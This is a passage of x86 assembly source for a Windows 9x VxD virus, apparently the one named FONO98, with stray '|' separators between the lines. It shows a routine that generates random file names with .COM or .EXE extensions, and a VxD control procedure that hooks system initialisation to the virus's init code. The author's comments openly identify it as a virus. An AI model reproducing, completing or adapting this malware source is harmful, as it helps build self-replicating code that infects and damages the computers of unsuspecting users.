loop NextLetter ;random name! :)
|
|
in al, 40h
|
|
cmp al, 80h
|
|
mov eax, 12345678h
|
|
org $-4
|
|
db '.', 'C', 'O', 'M'
|
|
jb PutThisOne ;put a .COM extension
|
|
mov eax, 12345678h
|
|
org $-4
|
|
db '.', 'E', 'X', 'E'
|
|
PutThisOne:
|
|
mov [edi], eax ;or a .EXE one
|
|
ret
|
|
EndProc Random4Name
|
|
|
|
|
|
|
|
BeginProc FONO98_Control
|
|
Control_Dispatch Init_Complete, FONO98_Device_Init
|
|
clc ;our init procedure...
|
|
ret ;other virus wait for more
|
|
EndProc FONO98_Control ;calls... but i did only this
|
|
;one and it worked, so...
|
|
|
|
|
|
VxD_Locked_Code_Ends
|
|
|
|
End
|